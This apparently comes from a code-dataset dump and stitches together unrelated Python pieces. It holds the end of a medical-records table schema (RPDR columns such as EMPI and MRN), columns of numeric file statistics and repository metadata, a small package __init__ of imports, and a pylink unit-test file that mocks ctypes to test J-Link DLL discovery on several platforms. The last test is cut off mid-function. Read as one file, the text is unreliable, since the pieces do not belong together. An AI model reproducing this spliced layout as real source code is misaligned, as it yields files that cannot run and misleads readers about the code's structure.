name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Rnd RPDR table
Rnd = Table(
name = 'Rnd',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = False,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Accession",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Department",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Exam_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "History1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "History2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "History3",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Long_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rad1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rad2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Rad3",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Req",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Division",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Region",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Specialty",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Body_Part",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "FileName",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# list of RPDR tables to consider
Tables = [
Car,
Con,
Dem,
Dia,
Dis,
Dpt,
Enc,
End,
Lab,
Lhm,
Lme,
Lno,
Lpr,
Lvs,
Med,
Mic,
Mrn,
Opn,
Pal,
Pal,
Pat,
Phy,
Prc,
Prv,
Pul,
Rad,
Rdt,
Rnd
]
| 31.516915
| 137
| 0.391586
| 9,376
| 163,037
| 6.774957
| 0.02933
| 0.092802
| 0.178962
| 0.197506
| 0.96036
| 0.959557
| 0.959557
| 0.959557
| 0.959447
| 0.959447
| 0
| 0.000308
| 0.52228
| 163,037
| 5,172
| 138
| 31.523009
| 0.815268
| 0.022271
| 0
| 0.927258
| 0
| 0
| 0.039457
| 0.001443
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0004
| 0
| 0.0004
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
64f055844ea24fe0be20309e7c0d331ccaa2e629
| 161
|
py
|
Python
|
hubward/__init__.py
|
raivivek/hubward
|
80d31d913bd062d8ec92ad20d132c3bfb132e652
|
[
"BSD-3-Clause"
] | null | null | null |
hubward/__init__.py
|
raivivek/hubward
|
80d31d913bd062d8ec92ad20d132c3bfb132e652
|
[
"BSD-3-Clause"
] | 1
|
2018-08-18T15:43:27.000Z
|
2018-08-26T02:32:09.000Z
|
hubward/__init__.py
|
raivivek/hubward
|
80d31d913bd062d8ec92ad20d132c3bfb132e652
|
[
"BSD-3-Clause"
] | null | null | null |
from . import utils
from . import liftover
from . import models
from . import generate_config_from_schema
from .log import log
from .version import __version__
| 20.125
| 41
| 0.807453
| 23
| 161
| 5.347826
| 0.434783
| 0.325203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15528
| 161
| 7
| 42
| 23
| 0.904412
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
56f93aac4965f9bad19d8b4eb389e45b48663101
| 34,197
|
py
|
Python
|
tests/unit/test_library.py
|
jn-yxy/pylink
|
651b0567cdc290e4ff7fbb2e1ff0923780e515d7
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_library.py
|
jn-yxy/pylink
|
651b0567cdc290e4ff7fbb2e1ff0923780e515d7
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_library.py
|
jn-yxy/pylink
|
651b0567cdc290e4ff7fbb2e1ff0923780e515d7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Square, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pylink.library as library
import pylink.util as util
import mock
import unittest
class TestLibrary(unittest.TestCase):
"""Unit test for the ``library`` submodule."""
def setUp(self):
"""Called before each test.
Performs setup.
Args:
self (TestLibrary): the ``TestLibrary`` instance
Returns:
``None``
"""
assertRaisesRegexp = getattr(self, 'assertRaisesRegexp', None)
self.assertRaisesRegexp = getattr(self, 'assertRaisesRegex', assertRaisesRegexp)
self.lib_path = '/'
def tearDown(self):
"""Called after each test.
Performs teardown.
Args:
self (TestLibrary): the ``TestLibrary`` instance
Returns:
``None``
"""
pass
def mock_directories(self, mock_os, structure, sep):
"""Mocks a directory structure.
This function is used to mock a directory structure, so that checking
if something is a file, is a directory, or listing directories will use
our mocked structure instead.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): the mocked ``os`` module
structure (list): a list of directories or files
sep (str): the operating system seperator
Returns:
``None``
"""
def isfile(f):
"""Returns whether the file exists in the structure."""
if not any(s.endswith(f) for s in structure):
return False
return '.' in f.split(sep)[-1]
mock_os.path.isfile.side_effect = isfile
def isdir(f):
"""Returns whether the directory exists within the structure."""
if not any(s.startswith(f) for s in structure):
return False
return not isfile(f)
mock_os.path.isdir.side_effect = isdir
def join(*args):
"""Joins several strings to form a path."""
s = ''
for arg in args:
if not s.endswith(sep) and len(s) > 0:
s += sep
s += arg
return s
mock_os.path.join.side_effect = join
def listdir(f):
"""List the files and directories within the directory."""
if not isdir(f):
return list()
directories = []
for s in structure:
if s.startswith(f):
s = s[len(f):]
if s.startswith(sep):
s = s[len(sep):]
directories.append(s.split(sep)[0])
return directories
mock_os.listdir.side_effect = listdir
def mock_walk(b):
r = list()
dirname = b
if not isdir(dirname):
return []
subdirs = filter(len, list(set([d for d in listdir(dirname) if isdir(join(dirname, d))])))
subfiles = filter(len, list(set([f for f in listdir(dirname) if isfile(join(dirname, f))])))
r.append((dirname, subdirs, subfiles))
for subdir in subdirs:
r.extend(mock_walk(join(dirname, subdir)))
return r
mock_os.walk.return_value = mock_walk(sep)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_initialize_default(self, mock_load_library, mock_find_library, mock_open):
"""Tests creating a library and finding the default DLL.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = self.lib_path
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_load_library.assert_called_once()
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('os.path.isdir')
def test_initialiaze_no(self, mock_isdir, mock_load_library, mock_find_library, mock_open):
"""Tests creating a library when the default DLL does not exist.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_isdir (Mock): mock for mocking the call to ``os.path.isdir``
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the clal to ``open()``
Returns:
``None``
"""
mock_isdir.return_value = False
mock_find_library.return_value = None
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(0, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_initialize_with_path(self, mock_load_library, mock_find_library, mock_open):
"""Tests creating a library when passing in a DLL path.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
lib = library.Library(self.lib_path)
lib.unload = mock.Mock()
self.assertEqual(0, mock_find_library.call_count)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_load_library.assert_called_once()
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
def test_initialize_windows(self, mock_ctypes, mock_find_library, mock_open):
"""Tests creating a library on a Windows machine.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_ctypes (Mock): a mocked version of the ctypes library
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_windll = mock.Mock()
mock_windll.__getitem__ = mock.Mock()
mock_cdll = mock.Mock()
mock_cdll.__getitem__ = mock.Mock()
mock_ctypes.windll = mock_windll
mock_ctypes.cdll = mock_cdll
mock_find_library.return_value = self.lib_path
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_cdll.LoadLibrary.assert_called_once()
mock_windll.LoadLibrary.assert_called_once()
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_load(self, mock_load_library, mock_find_library, mock_open):
"""Tests that we can pass in a path to a DLL to load.
If the path is valid, loads the given ``DLL``, otherwise stays the
same.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = self.lib_path
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
mock_open.assert_called_with(self.lib_path, 'rb')
self.assertEqual(1, mock_load_library.call_count)
new_path = '\\'
lib.load(new_path)
mock_open.assert_called_with(new_path, 'rb')
self.assertEqual(2, mock_load_library.call_count)
lib.load(None)
mock_open.assert_called_with(new_path, 'rb')
self.assertEqual(3, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('pylink.library.open', new=mock.MagicMock())
@mock.patch('pylink.library.ctypes')
@mock.patch('os.remove')
def test_unload_no_library(self, mock_remove, mock_ctypes):
"""Tests unloading the library when no DLL is loaded.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_remove (Mock): the mocked call to ``os.remove()``
mock_ctypes (Mock): mocked ``ctypes`` module
Returns:
``None``
"""
lib = library.Library('')
setattr(lib, '_lib', None)
setattr(lib, '_temp', None)
self.assertFalse(lib.unload())
mock_remove.assert_not_called()
@mock.patch('sys.platform', new='windows')
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('pylink.library.open', new=mock.MagicMock())
@mock.patch('pylink.library.ctypes')
@mock.patch('os.remove')
def test_unload_windows(self, mock_remove, mock_ctypes):
"""Tests unloading the library on Windows.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_remove (Mock): the mocked call to ``os.remove()``
mock_ctypes (Mock): mocked ``ctypes`` module
Returns:
``None``
"""
lib = library.Library('')
self.assertTrue(lib.unload())
self.assertEqual(2, mock_ctypes.windll.kernel32.FreeLibrary.call_count)
mock_remove.assert_called_once()
@mock.patch('sys.platform', new='darwin')
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('pylink.library.open', new=mock.MagicMock())
@mock.patch('pylink.library.ctypes')
@mock.patch('os.remove')
def test_unload_darwin_linux(self, mock_remove, mock_ctypes):
"""Tests unloading the library on Darwin and Linux platforms.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_remove (Mock): the mocked call to ``os.remove()``
mock_ctypes (Mock): mocked ``ctypes`` module
Returns:
``None``
"""
lib = library.Library('')
self.assertTrue(lib.unload())
mock_remove.assert_called_once()
self.assertEqual(None, lib._lib)
self.assertEqual(None, lib._temp)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_dll_getter(self, mock_load_library, mock_find_library, mock_open):
"""Tests that the ``.dll()`` getter returns the set ``DLL``.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = self.lib_path
mock_load_library.return_value = 0xDEADBEEF
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_load_library.assert_called_once()
self.assertEqual(0xDEADBEEF, lib.dll())
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_4_98_e(self, mock_os, mock_load_library, mock_find_library, mock_open):
    """Tests finding the DLL on Darwin through the SEGGER application for V4.98E-.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # System-path lookup fails, forcing the fallback scan of the SEGGER
    # application directory, which holds a V4.98E-era install layout.
    mock_find_library.return_value = None
    dylib_paths = [
        '/Applications/SEGGER/JLink 1/libjlinkarm.dylib'
    ]
    self.mock_directories(mock_os, dylib_paths, '/')

    jlink = library.Library()
    jlink.unload = mock.Mock()

    mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_5_0_0(self, mock_os, mock_load_library, mock_find_library, mock_open):
    """Tests finding the DLL on Darwin through the SEGGER application for V5.0.0+.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # Force the system-path lookup to fail so the search falls back to
    # scanning the SEGGER application directory.
    mock_find_library.return_value = None
    # V5.x installs ship version-suffixed dylibs (full and major-only).
    directories = [
        '/Applications/SEGGER/JLink/libjlinkarm.5.12.10.dylib',
        '/Applications/SEGGER/JLink/libjlinkarm.5.dylib'
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()  # prevent teardown side effects
    mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    # Exactly one of the discovered dylibs should be loaded.
    self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_6_0_0(self, mock_os, mock_load_library, mock_find_library, mock_open):
    """Tests finding the DLL on Darwin through the SEGGER application for V6.0.0+.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # No hit on the system search path; the V6-style application folder
    # contains a single unversioned dylib to be picked up.
    mock_find_library.return_value = None
    dylib_paths = [
        '/Applications/SEGGER/JLink/libjlinkarm.dylib'
    ]
    self.mock_directories(mock_os, dylib_paths, '/')

    jlink = library.Library()
    jlink.unload = mock.Mock()

    mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_empty(self, mock_os, mock_load_library, mock_find_library, mock_open):
    """Tests that no DLL is loaded on Darwin when the SEGGER application
    directory exists but contains no ``libjlinkarm`` dylib.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    mock_find_library.return_value = None
    # Only the bare directory is present -- no dylib file to discover.
    directories = [
        '/Applications/SEGGER/JLink/'
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    # Nothing was found, so the loader must never be invoked.
    self.assertEqual(0, mock_load_library.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_4_98_e(self, mock_os, mock_ctypes, mock_find_library, mock_open):
    """Tests finding the DLL on Windows through the SEGGER application for V4.98E-.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_ctypes (Mock): a mocked version of the ctypes library
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # Plain Mock does not support item access, so ``__getitem__`` is
    # attached explicitly for both the windll and cdll stand-ins.
    mock_windll = mock.Mock()
    mock_windll.__getitem__ = mock.Mock()
    mock_cdll = mock.Mock()
    mock_cdll.__getitem__ = mock.Mock()
    mock_ctypes.windll = mock_windll
    mock_ctypes.cdll = mock_cdll
    # No system-path hit; fall back to the versioned install directory.
    mock_find_library.return_value = None
    directories = [
        'C:\\Program Files\\SEGGER\\JLink_V49e\\JLinkARM.dll'
    ]
    self.mock_directories(mock_os, directories, '\\')
    lib = library.Library()
    lib.unload = mock.Mock()
    mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    # On Windows the DLL is loaded through both windll and cdll.
    self.assertEqual(1, mock_windll.LoadLibrary.call_count)
    self.assertEqual(1, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_5_10_0(self, mock_os, mock_ctypes, mock_find_library, mock_open):
    """Tests finding the DLL on Windows through the SEGGER application for V5.0.0+.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_ctypes (Mock): a mocked version of the ctypes library
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # Item access is not supported by a bare Mock, so it is stubbed in.
    windll = mock.Mock()
    windll.__getitem__ = mock.Mock()
    cdll = mock.Mock()
    cdll.__getitem__ = mock.Mock()
    mock_ctypes.windll = windll
    mock_ctypes.cdll = cdll

    # Fail the search-path lookup so the install directory scan runs.
    mock_find_library.return_value = None
    dll_paths = [
        'C:\\Program Files (x86)\\SEGGER\\JLink_V510l\\JLinkARM.dll'
    ]
    self.mock_directories(mock_os, dll_paths, '\\')

    jlink = library.Library()
    jlink.unload = mock.Mock()

    mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    self.assertEqual(1, windll.LoadLibrary.call_count)
    self.assertEqual(1, cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_jlinkarm(self, mock_os, mock_ctypes, mock_find_library, mock_open):
    """Tests finding the DLL on Windows through the SEGGER JLinkARM folder.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_ctypes (Mock): a mocked version of the ctypes library
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # Bare Mocks lack item access; attach ``__getitem__`` so the library
    # code can index into the windll/cdll stand-ins.
    mock_windll = mock.Mock()
    mock_windll.__getitem__ = mock.Mock()
    mock_cdll = mock.Mock()
    mock_cdll.__getitem__ = mock.Mock()
    mock_ctypes.windll = mock_windll
    mock_ctypes.cdll = mock_cdll
    # No search-path hit; the unversioned JLinkARM folder is scanned.
    mock_find_library.return_value = None
    directories = [
        'C:\\Program Files (x86)\\SEGGER\\JLinkARM\\JLinkARM.dll'
    ]
    self.mock_directories(mock_os, directories, '\\')
    lib = library.Library()
    lib.unload = mock.Mock()
    mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    # The DLL is loaded via both windll and cdll exactly once each.
    self.assertEqual(1, mock_windll.LoadLibrary.call_count)
    self.assertEqual(1, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_empty(self, mock_os, mock_ctypes, mock_find_library, mock_open):
    """Tests that no DLL is loaded on Windows when neither Program Files
    directory contains a SEGGER installation.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_ctypes (Mock): a mocked version of the ctypes library
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open``

    Returns:
      ``None``
    """
    # Stub in item access for the windll/cdll mocks.
    mock_windll = mock.Mock()
    mock_windll.__getitem__ = mock.Mock()
    mock_cdll = mock.Mock()
    mock_cdll.__getitem__ = mock.Mock()
    mock_ctypes.windll = mock_windll
    mock_ctypes.cdll = mock_cdll
    mock_find_library.return_value = None
    # Both candidate roots exist but hold no SEGGER install.
    directories = [
        'C:\\Program Files\\',
        'C:\\Program Files (x86)\\'
    ]
    self.mock_directories(mock_os, directories, '\\')
    lib = library.Library()
    lib.unload = mock.Mock()
    mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    # With nothing found, neither loader may be invoked.
    self.assertEqual(0, mock_windll.LoadLibrary.call_count)
    self.assertEqual(0, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='cygwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_cygwin(self, mock_os, mock_load_library, mock_find_library, mock_open):
    """Tests finding the DLL when running within Cygwin.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    # System lookup fails; two candidate installs exist on disk, but only
    # one DLL should actually be loaded.
    mock_find_library.return_value = None
    dll_paths = [
        'C:\\Program Files (x86)\\SEGGER\\JLinkARM\\JLinkARM.dll',
        'C:\\Program Files (x86)\\SEGGER\\JLink_V500l\\JLinkARM.dll'
    ]
    self.mock_directories(mock_os, dll_paths, '\\')

    jlink = library.Library()
    jlink.unload = mock.Mock()

